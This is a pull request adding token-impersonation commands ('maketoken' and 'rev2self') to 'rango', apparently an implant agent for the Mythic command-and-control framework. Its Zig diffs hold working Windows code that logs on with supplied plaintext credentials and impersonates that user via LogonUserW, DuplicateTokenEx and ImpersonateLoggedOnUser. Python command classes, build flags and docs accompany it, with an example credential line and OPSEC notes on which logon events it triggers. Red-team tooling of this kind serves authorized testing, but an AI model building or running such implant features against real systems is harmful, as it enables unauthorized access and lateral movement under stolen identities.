### PR TITLE
feat: maketoken and rev2self implementation

### DIFF
--- a/Payload_Type/rango/rango/agent_code/build.zig
+++ b/Payload_Type/rango/rango/agent_code/build.zig
@@ -14,6 +14,7 @@ pub fn build(b: *std.Build) void {
     const deletefile_option = b.option(bool, "deletefile", "Include deletefile command") orelse false;
     const deletedirectory_option = b.option(bool, "deletedirectory", "Include deletedirectory command") orelse false;
     const portscan_option = b.option(bool, "portscan", "Include portscan command") orelse false;
+    const maketoken_option = b.option(bool, "maketoken", "Include make_token command") orelse false;
 
     std.debug.print(
         \\Build Options:
@@ -26,8 +27,9 @@ pub fn build(b: *std.Build) void {
         \\  -Ddeletefile Include deletefile command [{}]
         \\  -Ddeletedirectory Include deletedirectory command [{}]
         \\  -Dportscan Include portscan command   [{}]
+        \\  -Dmaketoken Include make_token command   [{}]
         \\
-    , .{ shell_option, pwd_option, ls_option, cat_option, download_option, upload_option, deletefile_option, deletedirectory_option, portscan_option });
+    , .{ shell_option, pwd_option, ls_option, cat_option, download_option, upload_option, deletefile_option, deletedirectory_option, portscan_option, maketoken_option });
 
     const build_options = b.addOptions();
     build_options.addOption(bool, "shell", shell_option);
@@ -39,6 +41,7 @@ pub fn build(b: *std.Build) void {
     build_options.addOption(bool, "deletefile", deletefile_option);
     build_options.addOption(bool, "deletedirectory", deletedirectory_option);
     build_options.addOption(bool, "portscan", portscan_option);
+    build_options.addOption(bool, "maketoken", maketoken_option);
 
     const exe_mod = b.createModule(.{
         .root_source_file = b.path("src/main.zig"),

--- a/Payload_Type/rango/rango/agent_code/src/commands.zig
+++ b/Payload_Type/rango/rango/agent_code/src/commands.zig
@@ -19,7 +19,7 @@ const kernel32ext = struct {
 };
 
 const advapi32 = if (builtin.os.tag == .windows) struct {
-        pub extern "advapi32" fn LogonUserW(
+    pub extern "advapi32" fn LogonUserW(
         lpszUsername: [*:0]const u16,
         lpszDomain: [*:0]const u16,
         lpszPassword: [*:0]const u16,
@@ -453,7 +453,7 @@ pub const CommandExecutor = struct {
         const password_w = try std.unicode.utf8ToUtf16LeAllocZ(self.allocator, p.password);
         defer self.allocator.free(password_w);
 
-        // Before making a new token, revert to self if we are already 
+        // Before making a new token, revert to self if we are already
         // impersonating to avoid handle leaks and other weird insanity.
         if (self.impersonation_token) |old| {
             _ = advapi32.RevertToSelf();
@@ -482,7 +482,7 @@ pub const CommandExecutor = struct {
                 .status = "error",
             };
         }
-        defer _ =  kernel32ext.CloseHandle(h_token); //close primary keep dup
+        defer _ = kernel32ext.CloseHandle(h_token); //close primary keep dup
 
         var h_dup: windows.HANDLE = undefined;
         if (advapi32.DuplicateTokenEx(
@@ -573,7 +573,7 @@ pub const CommandExecutor = struct {
 
         return MythicResponse{
             .task_id = task.id,
-            .user_output = try std.fmt.allocPrint( self.allocator, "Reverted to original token", .{}),
+            .user_output = try std.fmt.allocPrint(self.allocator, "Reverted to original token", .{}),
             .completed = true,
             .status = "completed",
         };

--- a/Payload_Type/rango/rango/agent_code/src/commands.zig
+++ b/Payload_Type/rango/rango/agent_code/src/commands.zig
@@ -12,6 +12,12 @@ const ArrayList = std.ArrayList;
 const MythicTask = types.MythicTask;
 const MythicResponse = types.MythicResponse;
 
+const kernel32ext = struct {
+    pub extern "kernel32" fn CloseHandle(
+        hObject: windows.HANDLE,
+    ) callconv(.winapi) windows.BOOL;
+};
+
 const advapi32 = if (builtin.os.tag == .windows) struct {
         pub extern "advapi32" fn LogonUserW(
         lpszUsername: [*:0]const u16,
@@ -54,7 +60,8 @@ pub const CommandExecutor = struct {
     pub fn deinit(self: *CommandExecutor) void {
         if (builtin.os.tag == .windows) {
             if (self.impersonation_token) |token| {
-                windows.CloseHandle(token);
+                _ = advapi32.RevertToSelf();
+                _ = kernel32ext.CloseHandle(token);
                 self.impersonation_token = null;
             }
         }
@@ -414,7 +421,7 @@ pub const CommandExecutor = struct {
         if (comptime builtin.os.tag != .windows) {
             return MythicResponse{
                 .task_id = task.id,
-                .user_output = "make_token command is only supported on Windows",
+                .user_output = try std.fmt.allocPrint(self.allocator, "make_token command is only supported on Windows", .{}),
                 .completed = true,
                 .status = "error",
             };
@@ -450,7 +457,7 @@ pub const CommandExecutor = struct {
         // impersonating to avoid handle leaks and other weird insanity.
         if (self.impersonation_token) |old| {
             _ = advapi32.RevertToSelf();
-            windows.CloseHandle(old);
+            _ = kernel32ext.CloseHandle(old);
             self.impersonation_token = null;
         }
 
@@ -475,7 +482,7 @@ pub const CommandExecutor = struct {
                 .status = "error",
             };
         }
-        defer windows.CloseHandle(h_token); //close primary keep dup
+        defer _ =  kernel32ext.CloseHandle(h_token); //close primary keep dup
 
         var h_dup: windows.HANDLE = undefined;
         if (advapi32.DuplicateTokenEx(
@@ -501,7 +508,7 @@ pub const CommandExecutor = struct {
 
         if (advapi32.ImpersonateLoggedOnUser(h_dup) == windows.BOOL.FALSE) {
             const err = windows.GetLastError();
-            windows.CloseHandle(h_dup);
+            _ = kernel32ext.CloseHandle(h_dup);
             return MythicResponse{
                 .task_id = task.id,
                 .user_output = try std.fmt.allocPrint(
@@ -532,7 +539,7 @@ pub const CommandExecutor = struct {
         if (comptime builtin.os.tag != .windows) {
             return MythicResponse{
                 .task_id = task.id,
-                .user_output = "rev2self is Windows-only",
+                .user_output = try std.fmt.allocPrint(self.allocator, "rev2self is Windows-only", .{}),
                 .completed = true,
                 .status = "error",
             };
@@ -541,7 +548,7 @@ pub const CommandExecutor = struct {
         if (self.impersonation_token == null) {
             return MythicResponse{
                 .task_id = task.id,
-                .user_output = "No active impersonation token",
+                .user_output = try std.fmt.allocPrint(self.allocator, "No active impersonation token", .{}),
                 .completed = true,
                 .status = "error",
             };
@@ -561,12 +568,12 @@ pub const CommandExecutor = struct {
             };
         }
 
-        windows.CloseHandle(self.impersonation_token.?);
+        _ = kernel32ext.CloseHandle(self.impersonation_token.?);
         self.impersonation_token = null;
 
         return MythicResponse{
             .task_id = task.id,
-            .user_output = "Reverted to original token",
+            .user_output = try std.fmt.allocPrint( self.allocator, "Reverted to original token", .{}),
             .completed = true,
             .status = "completed",
         };

--- a/Payload_Type/rango/rango/agent_code/src/commands.zig
+++ b/Payload_Type/rango/rango/agent_code/src/commands.zig
@@ -4,6 +4,7 @@ const build_options = @import("build_options");
 const types = @import("types.zig");
 const json = std.json;
 const base64 = std.base64;
+const windows = std.os.windows;
 const Allocator = std.mem.Allocator;
 const Io = std.Io;
 const ArrayList = std.ArrayList;
@@ -11,15 +12,52 @@ const ArrayList = std.ArrayList;
 const MythicTask = types.MythicTask;
 const MythicResponse = types.MythicResponse;
 
+const advapi32 = if (builtin.os.tag == .windows) struct {
+        pub extern "advapi32" fn LogonUserW(
+        lpszUsername: [*:0]const u16,
+        lpszDomain: [*:0]const u16,
+        lpszPassword: [*:0]const u16,
+        dwLogonType: windows.DWORD,
+        dwLogonProvider: windows.DWORD,
+        phToken: *windows.HANDLE,
+    ) callconv(.winapi) windows.BOOL;
+
+    pub extern "advapi32" fn ImpersonateLoggedOnUser(
+        hToken: windows.HANDLE,
+    ) callconv(.winapi) windows.BOOL;
+
+    pub extern "advapi32" fn DuplicateTokenEx(
+        hExistingToken: windows.HANDLE,
+        dwDesiredAccess: windows.DWORD,
+        lpTokenAttributes: ?*anyopaque,
+        ImpersonationLevel: windows.DWORD,
+        TokenType: windows.DWORD,
+        phNewToken: *windows.HANDLE,
+    ) callconv(.winapi) windows.BOOL;
+
+    pub extern "advapi32" fn RevertToSelf() callconv(.winapi) windows.BOOL;
+} else struct {};
+
 pub const CommandExecutor = struct {
     allocator: Allocator,
     io: Io,
+    impersonation_token: if (builtin.os.tag == .windows) ?windows.HANDLE else void =
+        if (builtin.os.tag == .windows) null else {},
 
     pub fn init(allocator: Allocator, io: Io) CommandExecutor {
         return CommandExecutor{
             .allocator = allocator,
             .io = io,
         };
+    }
+
+    pub fn deinit(self: *CommandExecutor) void {
+        if (builtin.os.tag == .windows) {
+            if (self.impersonation_token) |token| {
+                windows.CloseHandle(token);
+                self.impersonation_token = null;
+            }
+        }
     }
 
     pub fn executeTask(self: *CommandExecutor, task: MythicTask) !MythicResponse {
@@ -61,6 +99,18 @@ pub const CommandExecutor = struct {
         if (comptime build_options.deletedirectory) {
             if (std.mem.eql(u8, task.command, "deletedirectory")) {
                 return try self.deleteDirectory(task);
+            }
+        }
+        // maketoken without rev2self is incomplete, so we also include rev2self
+        // if maketoken is enabled at compile time
+        if (builtin.os.tag == .windows) {
+            if (comptime build_options.maketoken) {
+                if (std.mem.eql(u8, task.command, "maketoken")) {
+                    return try self.executeMakeToken(task);
+                }
+                if (std.mem.eql(u8, task.command, "rev2self")) {
+                    return try self.executeRevToSelf(task);
+                }
             }
         }
         if (comptime build_options.portscan) {
@@ -355,6 +405,168 @@ pub const CommandExecutor = struct {
         return MythicResponse{
             .task_id = task.id,
             .user_output = try std.fmt.allocPrint(self.allocator, "Deleted directory: {s}", .{path}),
+            .completed = true,
+            .status = "completed",
+        };
+    }
+
+    fn executeMakeToken(self: *CommandExecutor, task: MythicTask) !MythicResponse {
+        if (comptime builtin.os.tag != .windows) {
+            return MythicResponse{
+                .task_id = task.id,
+                .user_output = "make_token command is only supported on Windows",
+                .completed = true,
+                .status = "error",
+            };
+        }
+
+        const LOGON32_LOGON_NEW_CREDENTIALS: windows.DWORD = 9;
+        const LOGON32_PROVIDER_DEFAULT: windows.DWORD = 0;
+        const TOKEN_ALL_ACCESS: windows.DWORD = 0xF01FF;
+        const SecurityImpersonation: windows.DWORD = 2;
+        const TokenImpersonation: windows.DWORD = 2;
+
+        const MakeTokenParams = struct {
+            username: []const u8,
+            domain: []const u8,
+            password: []const u8,
+            logon_type: ?u32 = null,
+        };
+
+        const parsed = try json.parseFromSlice(MakeTokenParams, self.allocator, task.parameters, .{});
+        defer parsed.deinit();
+
+        const p = parsed.value;
+        const logon_type: windows.DWORD = @intCast(p.logon_type orelse LOGON32_LOGON_NEW_CREDENTIALS);
+
+        const username_w = try std.unicode.utf8ToUtf16LeAllocZ(self.allocator, p.username);
+        defer self.allocator.free(username_w);
+        const domain_w = try std.unicode.utf8ToUtf16LeAllocZ(self.allocator, p.domain);
+        defer self.allocator.free(domain_w);
+        const password_w = try std.unicode.utf8ToUtf16LeAllocZ(self.allocator, p.password);
+        defer self.allocator.free(password_w);
+
+        // Before making a new token, revert to self if we are already 
+        // impersonating to avoid handle leaks and other weird insanity.
+        if (self.impersonation_token) |old| {
+            _ = advapi32.RevertToSelf();
+            windows.CloseHandle(old);
+            self.impersonation_token = null;
+        }
+
+        var h_token: windows.HANDLE = undefined;
+        if (advapi32.LogonUserW(
+            username_w,
+            domain_w,
+            password_w,
+            logon_type,
+            LOGON32_PROVIDER_DEFAULT,
+            &h_token,
+        ) == windows.BOOL.FALSE) {
+            const err = windows.GetLastError();
+            return MythicResponse{
+                .task_id = task.id,
+                .user_output = try std.fmt.allocPrint(
+                    self.allocator,
+                    "LogonUserW failed: error code {d}",
+                    .{@intFromEnum(err)},
+                ),
+                .completed = true,
+                .status = "error",
+            };
+        }
+        defer windows.CloseHandle(h_token); //close primary keep dup
+
+        var h_dup: windows.HANDLE = undefined;
+        if (advapi32.DuplicateTokenEx(
+            h_token,
+            TOKEN_ALL_ACCESS,
+            null,
+            SecurityImpersonation,
+            TokenImpersonation,
+            &h_dup,
+        ) == windows.BOOL.FALSE) {
+            const err = windows.GetLastError();
+            return MythicResponse{
+                .task_id = task.id,
+                .user_output = try std.fmt.allocPrint(
+                    self.allocator,
+                    "DuplicateTokenEx failed: error code {d}",
+                    .{@intFromEnum(err)},
+                ),
+                .completed = true,
+                .status = "error",
+            };
+        }
+
+        if (advapi32.ImpersonateLoggedOnUser(h_dup) == windows.BOOL.FALSE) {
+            const err = windows.GetLastError();
+            windows.CloseHandle(h_dup);
+            return MythicResponse{
+                .task_id = task.id,
+                .user_output = try std.fmt.allocPrint(
+                    self.allocator,
+                    "ImpersonateLoggedOnUser failed: error code {d}",
+                    .{@intFromEnum(err)},
+                ),
+                .completed = true,
+                .status = "error",
+            };
+        }
+
+        self.impersonation_token = h_dup;
+
+        return MythicResponse{
+            .task_id = task.id,
+            .user_output = try std.fmt.allocPrint(
+                self.allocator,
+                "Impersonating {s}\\{s} (logon type {d})",
+                .{ p.domain, p.username, logon_type },
+            ),
+            .completed = true,
+            .status = "completed",
+        };
+    }
+
+    fn executeRevToSelf(self: *CommandExecutor, task: MythicTask) !MythicResponse {
+        if (comptime builtin.os.tag != .windows) {
+            return MythicResponse{
+                .task_id = task.id,
+                .user_output = "rev2self is Windows-only",
+                .completed = true,
+                .status = "error",
+            };
+        }
+
+        if (self.impersonation_token == null) {
+            return MythicResponse{
+                .task_id = task.id,
+                .user_output = "No active impersonation token",
+                .completed = true,
+                .status = "error",
+            };
+        }
+
+        if (advapi32.RevertToSelf() == windows.BOOL.FALSE) {
+            const err = windows.GetLastError();
+            return MythicResponse{
+                .task_id = task.id,
+                .user_output = try std.fmt.allocPrint(
+                    self.allocator,
+                    "RevertToSelf failed: error code {d}",
+                    .{@intFromEnum(err)},
+                ),
+                .completed = true,
+                .status = "error",
+            };
+        }
+
+        windows.CloseHandle(self.impersonation_token.?);
+        self.impersonation_token = null;
+
+        return MythicResponse{
+            .task_id = task.id,
+            .user_output = "Reverted to original token",
             .completed = true,
             .status = "completed",
         };

--- a/Payload_Type/rango/rango/agent_functions/builder.py
+++ b/Payload_Type/rango/rango/agent_functions/builder.py
@@ -169,9 +169,11 @@ pub const agentConfig: types.AgentConfig = .{{
         # Commands that map 1:1 to -D build flags in build.zig
         flaggable_commands = {
             "shell", "pwd", "ls", "cat", "download",
-            "upload", "deletefile", "deletedirectory", "portscan"
+            "upload", "deletefile", "deletedirectory", "portscan", "maketoken"
         }
         selected_commands = self.commands.get_commands()
+        if "maketoken" in selected_commands and "rev2self" not in selected_commands:
+            selected_commands = list(selected_commands) + ["rev2self"]
         zig_flags = " ".join(
             f"-D{cmd}=true"
             for cmd in selected_commands
@@ -260,7 +262,7 @@ pub const agentConfig: types.AgentConfig = .{{
         try:
             all_rango_commands = [
                 "cat", "deletedirectory", "deletefile", "download",
-                "exit", "ls", "portscan", "pwd", "shell", "upload"
+                "exit", "ls", "portscan", "pwd", "shell", "upload", "maketoken"
             ]
             unselected_commands = [cmd for cmd in all_rango_commands if cmd not in selected_commands]
             for cmd in unselected_commands:

--- a/Payload_Type/rango/rango/agent_functions/maketoken.py
+++ b/Payload_Type/rango/rango/agent_functions/maketoken.py
@@ -38,7 +38,7 @@ class MakeTokenCommand(CommandBase):
     cmd = "maketoken"
     needs_admin = False
     help_cmd = "maketoken <username> <domain> <password> [logon_type]"
-    description = "Creates a new logon session with supplied credentials and impersonates it on the current thread. Network auth will use the new identity. Default logon type 9 (LOGON32_LOGON_NEW_CREDENTIALS)."
+    description = "creates a new logon session with supplied credentials and impersonates it on the current thread. network auth will use the new identity. default logon type 9 (logon32_logon_new_credentials)."
     version = 1
     author = "@pop-ecx"
     attackmapping = ["T1134", "T1134.003"]

--- a/Payload_Type/rango/rango/agent_functions/maketoken.py
+++ b/Payload_Type/rango/rango/agent_functions/maketoken.py
@@ -1,0 +1,114 @@
+from mythic_container.MythicCommandBase import *
+from mythic_container.MythicRPC import *
+from mythic_container.MythicGoRPC import *
+
+class MakeTokenArguments(TaskArguments):
+    def __init__(self, command_line, **kwargs):
+        super().__init__(command_line, **kwargs)
+        self.args = [
+            CommandParameter(name="username", display_name="Username", type=ParameterType.String,
+                             description="Username to impersonate"),
+            CommandParameter(name="domain", display_name="Domain", type=ParameterType.String,
+                             description="Domain (use . for local accounts)"),
+            CommandParameter(name="password", display_name="Password", type=ParameterType.String,
+                             description="Plaintext password for the account"),
+            CommandParameter(name="logon_type", display_name="Logon Type", type=ParameterType.Number,
+                             description="Windows logon type (default 9 = LOGON32_LOGON_NEW_CREDENTIALS)",
+                             default_value=9),
+        ]
+
+    async def parse_arguments(self):
+        if len(self.command_line) == 0:
+            raise ValueError("Must supply username, domain, and password")
+        # Support positional: maketoken username domain password
+        parts = self.command_line.split()
+        if len(parts) >= 3:
+            self.add_arg("username", parts[0])
+            self.add_arg("domain", parts[1])
+            self.add_arg("password", parts[2])
+            self.add_arg("logon_type", int(parts[3]) if len(parts) >= 4 else 9)
+        else:
+            raise ValueError("Usage: maketoken <username> <domain> <password> [logon_type]")
+
+    async def parse_dictionary(self, dictionary_arguments):
+        self.load_args_from_dictionary(dictionary_arguments)
+
+
+class MakeTokenCommand(CommandBase):
+    cmd = "maketoken"
+    needs_admin = False
+    help_cmd = "maketoken <username> <domain> <password> [logon_type]"
+    description = "Creates a new logon session with supplied credentials and impersonates it on the current thread. Network auth will use the new identity. Default logon type 9 (LOGON32_LOGON_NEW_CREDENTIALS)."
+    version = 1
+    author = "@pop-ecx"
+    attackmapping = ["T1134", "T1134.003"]
+    argument_class = MakeTokenArguments
+    attributes = CommandAttributes(
+        suggested_command=False
+    )
+
+    async def opsec_pre(self, taskData: PTTaskMessageAllData) -> PTTTaskOPSECPreTaskMessageResponse:
+        response = PTTTaskOPSECPreTaskMessageResponse(
+            TaskID=taskData.Task.ID,
+            Success=True,
+            OpsecPreBlocked=True,
+            OpsecPreBypassRole="other_operator",
+            OpsecPreMessage=(
+                "WARNING: maketoken submits plaintext credentials via LogonUserW. "
+                "Generates Event ID 4624 + 4648 on the authenticating DC. "
+                "Ensure operational need justifies credential exposure."
+            ),
+        )
+        return response
+
+    async def opsec_post(self, taskData: PTTaskMessageAllData) -> PTTTaskOPSECPostTaskMessageResponse:
+        response = PTTTaskOPSECPostTaskMessageResponse(
+            TaskID=taskData.Task.ID,
+            Success=True,
+            OpsecPostBlocked=False,
+            OpsecPostBypassRole="other_operator",
+            OpsecPostMessage="Token impersonation applied to thread.",
+        )
+        return response
+
+    async def create_go_tasking(self, taskData: MythicCommandBase.PTTaskMessageAllData) -> MythicCommandBase.PTTaskCreateTaskingMessageResponse:
+        import json
+        params = json.dumps({
+            "username": taskData.args.get_arg("username"),
+            "domain": taskData.args.get_arg("domain"),
+            "password": taskData.args.get_arg("password"),
+            "logon_type": taskData.args.get_arg("logon_type"),
+        })
+        response = MythicCommandBase.PTTaskCreateTaskingMessageResponse(
+            TaskID=taskData.Task.ID,
+            Success=True,
+            Parameters=params,
+        )
+        await SendMythicRPCArtifactCreate(MythicRPCArtifactCreateMessage(
+            TaskID=taskData.Task.ID,
+            ArtifactMessage="LogonUserW({}\\{}, logon_type={})".format(
+                taskData.args.get_arg("domain"),
+                taskData.args.get_arg("username"),
+                taskData.args.get_arg("logon_type"),
+            ),
+            BaseArtifactType="API Call"
+        ))
+        response.DisplayParams = "{}\\{} (type {})".format(
+            taskData.args.get_arg("domain"),
+            taskData.args.get_arg("username"),
+            taskData.args.get_arg("logon_type"),
+        )
+        return response
+
+    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:
+        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)
+        if isinstance(response, dict) and "user_output" in response:
+            resp.Output = response["user_output"]
+            if "status" in response and response["status"] == "error":
+                resp.Success = False
+        elif isinstance(response, str):
+            resp.Output = response
+        else:
+            resp.Output = "Unexpected response format: " + str(response)
+        resp.completed = True
+        return resp

--- a/Payload_Type/rango/rango/agent_functions/rev2self.py
+++ b/Payload_Type/rango/rango/agent_functions/rev2self.py
@@ -18,7 +18,7 @@ class Rev2SelfCommand(CommandBase):
     cmd = "rev2self"
     needs_admin = False
     help_cmd = "rev2self"
-    description = "Reverts the current thread token to the original process token, dropping any active make_token impersonation."
+    description = "Reverts the current thread token to the original process token, dropping any active maketoken impersonation."
     version = 1
     author = "@pop-ecx"
     attackmapping = ["T1134"]

--- a/Payload_Type/rango/rango/agent_functions/rev2self.py
+++ b/Payload_Type/rango/rango/agent_functions/rev2self.py
@@ -1,0 +1,75 @@
+from mythic_container.MythicCommandBase import *
+from mythic_container.MythicRPC import *
+from mythic_container.MythicGoRPC import *
+
+class Rev2SelfArguments(TaskArguments):
+    def __init__(self, command_line, **kwargs):
+        super().__init__(command_line, **kwargs)
+        self.args = []
+
+    async def parse_arguments(self):
+        pass
+
+    async def parse_dictionary(self, dictionary_arguments):
+        pass
+
+
+class Rev2SelfCommand(CommandBase):
+    cmd = "rev2self"
+    needs_admin = False
+    help_cmd = "rev2self"
+    description = "Reverts the current thread token to the original process token, dropping any active make_token impersonation."
+    version = 1
+    author = "@pop-ecx"
+    attackmapping = ["T1134"]
+    argument_class = Rev2SelfArguments
+    attributes = CommandAttributes(
+        suggested_command=False
+    )
+
+    async def opsec_pre(self, taskData: PTTaskMessageAllData) -> PTTTaskOPSECPreTaskMessageResponse:
+        response = PTTTaskOPSECPreTaskMessageResponse(
+            TaskID=taskData.Task.ID,
+            Success=True,
+            OpsecPreBlocked=False,
+            OpsecPreBypassRole="other_operator",
+            OpsecPreMessage="Reverting thread token to original.",
+        )
+        return response
+
+    async def opsec_post(self, taskData: PTTaskMessageAllData) -> PTTTaskOPSECPostTaskMessageResponse:
+        response = PTTTaskOPSECPostTaskMessageResponse(
+            TaskID=taskData.Task.ID,
+            Success=True,
+            OpsecPostBlocked=False,
+            OpsecPostBypassRole="other_operator",
+            OpsecPostMessage="Token reverted.",
+        )
+        return response
+
+    async def create_go_tasking(self, taskData: MythicCommandBase.PTTaskMessageAllData) -> MythicCommandBase.PTTaskCreateTaskingMessageResponse:
+        response = MythicCommandBase.PTTaskCreateTaskingMessageResponse(
+            TaskID=taskData.Task.ID,
+            Success=True,
+            Parameters="",
+        )
+        await SendMythicRPCArtifactCreate(MythicRPCArtifactCreateMessage(
+            TaskID=taskData.Task.ID,
+            ArtifactMessage="RevertToSelf()",
+            BaseArtifactType="API Call"
+        ))
+        response.DisplayParams = ""
+        return response
+
+    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:
+        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)
+        if isinstance(response, dict) and "user_output" in response:
+            resp.Output = response["user_output"]
+            if "status" in response and response["status"] == "error":
+                resp.Success = False
+        elif isinstance(response, str):
+            resp.Output = response
+        else:
+            resp.Output = "Unexpected response format: " + str(response)
+        resp.completed = True
+        return resp

--- a/documentation-payload/rango/commands/maketoken.md
+++ b/documentation-payload/rango/commands/maketoken.md
@@ -1,0 +1,30 @@
+## Description
+Creates a new logon session with supplied credentials and impersonates it on the
+current thread. network auth will use the new identity. default logon type 9 (logon32_logon_new_credentials).
+
+### Parameters
+`username`
+ * the user you want to impersonate.
+
+ `domain`
+ * the domain of the user you want to impersonate. Use `.` for local accounts.
+
+`password`
+* the password of the user you want to impersonate. If it is a local account, make sure the password is correct.
+
+`logon_type`
+* the logon type to use. Default is 9 (logon32_logon_new_credentials). For more info on logon types, see https://learn.microsoft.com/en-us/windows-server/identity/securing-privileged-access/reference-tools-logon-types
+
+
+## Usage
+
+To best use this just run the command `maketoken` with no params. A popup will ask you for the parameters.
+
+### Examples
+
+```
+maketoken test . P@ssw0rd 9
+```
+
+> Caution: maketoken submits plaintext credentials via LogonUserW. Generates Event ID 4624 + 4648 on the authenticating DC. Ensure operational need justifies credential exposure. May be OPSEC sensitive.
+ 

--- a/documentation-payload/rango/commands/rev2self.md
+++ b/documentation-payload/rango/commands/rev2self.md
@@ -1,0 +1,13 @@
+## Description
+Reverts the current thread token to the original process token, dropping any active make_token impersonation.
+
+## Usage
+
+Just run rev2self with no params.
+`rev2self`
+
+### Examples
+
+```
+rev2self
+```


### PR DESCRIPTION
This PR seeks to add maketoken and rev2self capabilities to the agent. Make sure to check its documentation for the usage info.

The following has been done:

* Add maketoken and rev2self options to mythic UI builder
* Add maketoken condtional compilation option (also compiles rev2self)
* docs: maketoken and rev2self

TODO:

* Add rev2self as a dependency of maketoken in the UI builder so if maketoken is chosen it automatically includes rev2self